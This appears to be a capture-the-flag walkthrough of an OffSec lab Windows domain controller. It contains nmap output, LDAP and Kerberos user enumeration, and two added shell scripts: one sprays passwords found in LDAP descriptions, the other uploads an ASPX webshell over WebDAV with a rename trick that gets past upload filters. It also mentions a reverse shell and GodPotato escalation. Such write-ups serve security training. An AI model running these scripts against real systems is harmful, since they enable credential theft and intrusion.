Date
Mar 26, 2025
Tag
Nmap
User Enumeration
LDAP Enumeration
192.168.108.122
Nmap
└─# nmap -sU -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 02:57 EDT
Nmap scan report for 192.168.108.122
Host is up (0.057s latency).
Not shown: 65532 open|filtered udp ports (no-response)
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
Nmap done: 1 IP address (1 host up) scanned in 26.70 seconds
└─# nmap -sT -p- --min-rate 5000 $ip
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 02:57 EDT
Nmap scan report for 192.168.108.122
Host is up (0.059s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49666/tcp open unknown
49668/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49676/tcp open unknown
49692/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 26.56 seconds
└─# nmap -Pn -n $ip -sC -sV -p- --open -oN nmap.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 02:59 EDT
Nmap scan report for 192.168.108.122
Host is up (0.062s latency).
Not shown: 65514 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| Server Type: Microsoft-IIS/10.0
| Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
|_ Server Date: Wed, 26 Mar 2025 07:02:22 GMT
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-26 07:01:33Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49676/tcp open msrpc Microsoft Windows RPC
49692/tcp open msrpc Microsoft Windows RPC
49768/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-03-26T07:02:23
|_ start_date: N/A
|_clock-skew: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 243.46 seconds
└─# nmap $ip --script=msrpc-enum
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-26 03:08 EDT
Nmap scan report for 192.168.108.122
Host is up (0.058s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
Host script results:
|_msrpc-enum: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
Nmap done: 1 IP address (1 host up) scanned in 6.27 seconds
hostname = HUTCHDC (from the nmap Service Info line) & domain = hutch.offsec
dn: CN=Administrator,CN=Users,DC=hutch,DC=offsec
80

Nothing found in path enumeration; IIS advertises WebDAV methods (PUT, MOVE, PROPFIND and the rest) in the nmap output above, so the port is worth revisiting once we have credentials.
139,445

Nothing found with anonymous access (SMB signing is enabled and required).
5985

Nothing found in path enumeration (WinRM; only useful once we have credentials).
LDAP Enumeration
Use this command to list the users in the domain, and in the output we found the following:
We have the password of user fmcsorley from the LDAP output, and we can now list all users.
Run kerbrute to confirm which usernames exist and to check whether Kerberos pre-authentication is disabled for any of them.
If pre-auth is disabled for a user, we can AS-REP roast that account (request an AS-REP for it and crack the encrypted part offline) to get domain credentials. Kerberoasting is the separate attack against accounts with an SPN and needs a valid domain account first.
../kerbrute_linux_amd64 userenum -d hutch.offsec --dc $ip users

Spray the recovered password across the user list:
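The user-listing, kerbrute and spray steps above as one script. This is an added example, not a command from the original notes: it pulls users over an anonymous LDAP bind with ldapsearch, parses the LDIF (including folded and base64-encoded values, which ldapsearch emits for long or space-padded descriptions) into a kerbrute-ready user list, flags description attributes that look like they hold a password, and sprays with crackmapexec. The DC address, base DN, file names, SPRAY_PASSWORD and the sample LDIF are assumptions or constructed data.

```shell
#!/usr/bin/env bash
# Added example (not part of the original notes): enumerate domain users over an
# anonymous LDAP bind, turn the LDIF into a kerbrute-ready user list, and flag
# description attributes that look like they carry a password. The DC address,
# base DN, file names and the sample LDIF below are assumptions/constructed data.

DC="${DC:-192.168.108.122}"
BASE_DN="${BASE_DN:-DC=hutch,DC=offsec}"
DOMAIN="${DOMAIN:-hutch.offsec}"

# Live query: -x is a simple bind, and with no -D/-w it is an anonymous bind.
ldap_dump_users() {
    ldapsearch -x -H "ldap://$DC" -b "$BASE_DN" \
        '(&(objectClass=user)(objectCategory=person))' sAMAccountName description
}

# LDIF folds long values onto continuation lines that start with one space; join them.
ldif_unfold() { sed -e :a -e '$!N;s/\n //;ta' -e 'P;D'; }

# LDIF on stdin -> one "sAMAccountName<TAB>description" line per entry.
# Values with non-ASCII or leading/trailing spaces arrive base64-encoded ("attr:: ...").
ldif_users() {
    ldif_unfold | awk '
        /^dn: /              { flush() }
        /^sAMAccountName: /  { sam = substr($0, 17) }
        /^description: /     { desc = substr($0, 14) }
        /^description:: /    { cmd = "printf %s " substr($0, 15) " | base64 -d"
                               cmd | getline desc; close(cmd) }
        END                  { flush() }
        function flush() { if (sam != "") print sam "\t" desc; sam = ""; desc = "" }'
}

# Keep only entries whose description smells like a credential.
cred_hints() { awk -F'\t' 'tolower($2) ~ /pass|pwd|cred/'; }

# Constructed sample LDIF (not real output from the target).
SAMPLE_LDIF='dn: CN=Administrator,CN=Users,DC=hutch,DC=offsec
sAMAccountName: Administrator
description: Built-in account for administering the computer/doma
 in

dn: CN=John Doe,CN=Users,DC=hutch,DC=offsec
sAMAccountName: jdoe

dn: CN=Alice Smith,CN=Users,DC=hutch,DC=offsec
description:: VGVtcCBwYXNzOiBTM2NyZXQh
sAMAccountName: asmith

# search result
search: 2
result: 0 Success'

# Full pipeline against the live DC: users file, kerbrute, then a password spray with
# the password taken from the flagged description (assumes crackmapexec is installed).
enum_and_spray() {
    ldap_dump_users | ldif_users > users.tsv
    cut -f1 users.tsv > users
    cred_hints < users.tsv
    kerbrute userenum -d "$DOMAIN" --dc "$DC" users
    if [ -n "${SPRAY_PASSWORD:-}" ]; then
        crackmapexec smb "$DC" -u users -p "$SPRAY_PASSWORD" --continue-on-success
    fi
}
```

Offline, `printf '%s\n' "$SAMPLE_LDIF" | ldif_users | cred_hints` prints the one constructed entry whose description contains a password; against the DC, set SPRAY_PASSWORD to the value pulled from the real description and call `enum_and_spray`. The spray runs with `--continue-on-success` so a hit on one account does not stop the run, which matters when the same password has been reused.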

Access the WebDAV server on port 80 using cadaver and the credentials we recovered:

Upload the cmd.aspx webshell and use it to launch our reverse shell.
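The same upload done with curl instead of the interactive cadaver session, as an added example that is not part of the original notes. It first parses the OPTIONS response for the Allow and Public headers (in the nmap output above, PUT appears under "Public Options" but not under "Allowed Methods", which is why both are read and why a fallback exists), then PUTs the webshell and, if IIS request filtering rejects a direct PUT of an .aspx, uploads it as .txt and renames it server-side with MOVE. The target URL, credentials, file name and the sample response are assumptions or constructed data.

```shell
#!/usr/bin/env bash
# Added example (not part of the original notes): check which WebDAV methods the IIS
# root accepts, then upload the webshell with curl as a scriptable alternative to
# cadaver. If IIS request filtering refuses a direct PUT of the .aspx, upload it as
# .txt and rename it server-side with MOVE. Target, credentials, file name and the
# sample response below are assumptions/constructed data.

TARGET="${TARGET:-http://${ip:-192.168.108.122}}"
CREDS="${CREDS:-fmcsorley:CHANGEME}"      # assumption: the credentials recovered over LDAP
SHELL_FILE="${SHELL_FILE:-cmd.aspx}"

# Raw HTTP response headers on stdin -> one line of space-separated, upper-cased
# method names taken from the Allow: and Public: headers.
webdav_methods() {
    tr -d '\r' | awk '
        tolower($1) == "allow:" || tolower($1) == "public:" {
            sub(/^[^:]*:[ \t]*/, "")
            n = split($0, m, /[ \t]*,[ \t]*/)
            for (i = 1; i <= n; i++) seen[toupper(m[i])] = 1
        }
        END { for (k in seen) printf "%s ", k; print "" }'
}

# has_method "<method list>" PUT  -> exit 0 if the method is present
has_method() { printf '%s\n' "$1" | grep -qw "$2"; }

# Writable for our purposes if we can PUT, or at least MOVE something into place.
webdav_can_write() { has_method "$1" PUT || has_method "$1" MOVE; }

# Live probe of the target root (needs network). Add --ntlm if the server insists on NTLM.
webdav_probe() { curl -s -i -X OPTIONS -u "$CREDS" "$TARGET/" | webdav_methods; }

# Upload a file and print its URL on success. Falls back to PUT-as-.txt + MOVE.
webdav_upload() {
    local file="$1" name code
    name=$(basename "$file")
    code=$(curl -s -o /dev/null -w '%{http_code}' -u "$CREDS" -T "$file" "$TARGET/$name")
    case "$code" in
        200|201|204) printf '%s/%s\n' "$TARGET" "$name"; return 0 ;;
    esac
    echo "direct PUT of $name returned HTTP $code, trying .txt + MOVE" >&2
    code=$(curl -s -o /dev/null -w '%{http_code}' -u "$CREDS" -T "$file" "$TARGET/$name.txt")
    case "$code" in
        200|201|204) ;;
        *) echo "PUT $name.txt failed (HTTP $code)" >&2; return 1 ;;
    esac
    code=$(curl -s -o /dev/null -w '%{http_code}' -u "$CREDS" -X MOVE \
               -H "Destination: $TARGET/$name" -H "Overwrite: T" "$TARGET/$name.txt")
    case "$code" in
        200|201|204) printf '%s/%s\n' "$TARGET" "$name" ;;
        *) echo "MOVE to $name failed (HTTP $code)" >&2; return 1 ;;
    esac
}

# Constructed OPTIONS response modelled on the http-webdav-scan output above (not a real capture).
SAMPLE_OPTIONS_RESPONSE='HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
Public: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
DAV: 1,2,3
Server: Microsoft-IIS/10.0'

# Typical run: webdav_probe, then webdav_upload "$SHELL_FILE" and open the printed URL in a browser.
```

Once the URL is printed, open the webshell in the browser and run the reverse-shell one-liner from there, with a listener already up. Offline, `printf '%s\n' "$SAMPLE_OPTIONS_RESPONSE" | webdav_methods` shows the parsed method set from the constructed response.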



And with that we are in.

PE

We can see that the privilege GodPotato abuses (SeImpersonatePrivilege) is enabled, so use GodPotato to escalate to SYSTEM.


